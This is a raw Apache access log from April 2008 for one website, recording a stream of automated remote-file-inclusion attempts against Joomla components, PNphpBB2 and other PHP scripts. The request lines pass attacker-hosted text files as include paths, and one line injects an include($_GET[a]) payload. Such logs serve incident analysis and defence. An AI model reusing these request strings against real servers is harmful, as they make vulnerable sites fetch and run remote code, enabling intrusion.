64.38.19.130 - - [29/Apr/2008:09:22:17 -0700] "GET /logs/access_080220.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.greytauctions.org/phpAdsNew/auctions.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:09:22:27 -0700] "GET /logs/access_080219.log/main.php?site=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:09:22:27 -0700] "GET /main.php?site=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.113.203.55 - - [29/Apr/2008:09:22:28 -0700] "GET /logs/main.php?site=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:22:29 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:09:22:31 -0700] "GET /logs//atom.php5?page=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.14.1.101 - - [29/Apr/2008:09:22:31 -0700] "GET //atom.php5?page=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
80.153.20.230 - - [29/Apr/2008:09:23:02 -0700] "GET /logs/access_080218.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:23:19 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:23:23 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:23:24 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:24:24 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:24:24 -0700] "GET /logs/access_080215.log/account.php?action=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:24:29 -0700] "GET /account.php?action=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:24:33 -0700] "GET /logs/account.php?action=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:24:49 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.75.104 - - [29/Apr/2008:09:24:54 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.stiri-mondene.com//id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:25:07 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.121 - - [29/Apr/2008:09:25:08 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.124 - - [29/Apr/2008:09:25:11 -0700] "GET /megumi/Bracelet/?S=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:25:12 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.31 - - [29/Apr/2008:09:25:13 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.805" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:25:21 -0700] "GET /logs/index.php?option=com_portfol&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
196.7.147.171 - - [29/Apr/2008:09:25:25 -0700] "GET /index.php?option=com_portfol&Itemid=&mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:25:30 -0700] "GET /logs/access_080107.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:25:32 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:25:32 -0700] "GET //atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:25:32 -0700] "GET /logs//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:25:35 -0700] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:25:36 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.40.157 - - [29/Apr/2008:09:25:45 -0700] "GET /logs/access.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.51.194 - - [29/Apr/2008:09:25:47 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:25:48 -0700] "GET /logs/access_080329.log//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:25:49 -0700] "GET //atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:25:49 -0700] "GET /logs//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:25:50 -0700] "GET /logs/access_080214.log/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:25:56 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 45276 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [29/Apr/2008:09:25:57 -0700] "GET /////?mosConfig_absolute_path=http://www.knowledgeteam.altervista.org/asfasdf/543534/forum.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:26:00 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
222.122.156.59 - - [29/Apr/2008:09:26:01 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.9.153.150 - - [29/Apr/2008:09:26:05 -0700] "GET /logs/access_080324.log//atom.php5?page=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:09:26:19 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:09:26:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:09:26:20 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.99.192 - - [29/Apr/2008:09:26:22 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.99.192 - - [29/Apr/2008:09:26:22 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.93.123 - - [29/Apr/2008:09:26:27 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/OLE.php=http://computasiunair.com/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.111.176.28 - - [29/Apr/2008:09:27:08 -0700] "GET //errors.....ng/upload/trem/oldbisok??//forums//index.php?name=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:09:27:19 -0700] "GET /logs//infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:09:27:19 -0700] "GET //infusions/stats_info_panel/log.inc.php?gethostbyaddr=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:09:27:23 -0700] "GET /logs/access_080308.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:09:27:23 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:09:27:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [29/Apr/2008:09:27:23 -0700] "GET /logs/access_080321.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:08 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:08 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:09 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [29/Apr/2008:09:28:09 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:28:19 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:29:06 -0700] "GET /logs/access_080107.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:29:08 -0700] "GET /index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:29:09 -0700] "GET /logs/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:09:29:10 -0700] "GET /logs/access.log//main.php?sayfa=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:09:29:12 -0700] "GET /logs/access_080229.log/modules/xfsection//modify.php?dir_module=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:09:29:12 -0700] "GET /modules/xfsection//modify.php?dir_module=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:09:29:13 -0700] "GET /logs/modules/xfsection//modify.php?dir_module=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [29/Apr/2008:09:29:16 -0700] "GET /logs/access_080112.log/modules/xfsection//modify.php?dir_module=http://www.loader.fr/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:29:16 -0700] "GET /logs/access_080305.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.148.29.218 - - [29/Apr/2008:09:29:20 -0700] "GET /logs/access.log/index.php?option=com_joomlaxplorer&action=show_error&dir=http://agonyandivy.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:20 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:20 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:21 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:27 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:27 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:28 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:31 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:29:33 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.193.60.15 - - [29/Apr/2008:09:29:34 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:29:41 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:29:41 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:29:41 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:29:46 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.127.253.161 - - [29/Apr/2008:09:29:48 -0700] "GET /logs/access_080205.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.ttb.org.tr/avian/templates/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:29:50 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:29:50 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [29/Apr/2008:09:29:50 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:30:15 -0700] "GET /logs/access.log/skins/advanced/advanced1.php?pluginpath[0]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:30:17 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:30:17 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:30:17 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:30:18 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:30:18 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:30:18 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:30:19 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:30:19 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:19 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:30:19 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:30:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:19 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.56.178 - - [29/Apr/2008:09:30:19 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:19 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:19 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:20 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:30:21 -0700] "GET /logs/access_080227.log/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:21 -0700] "GET //Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:30:21 -0700] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.129.6 - - [29/Apr/2008:09:30:21 -0700] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://bvaclub.free.fr//administrator/components/idN.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:21 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.95.45 - - [29/Apr/2008:09:30:21 -0700] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.255.103.140 - - [29/Apr/2008:09:30:22 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:09:30:25 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:26 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:26 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:09:30:27 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:27 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:27 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:27 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.los-chamos.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.124.100 - - [29/Apr/2008:09:30:27 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://forum.radiojohn.nl/auction/images/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
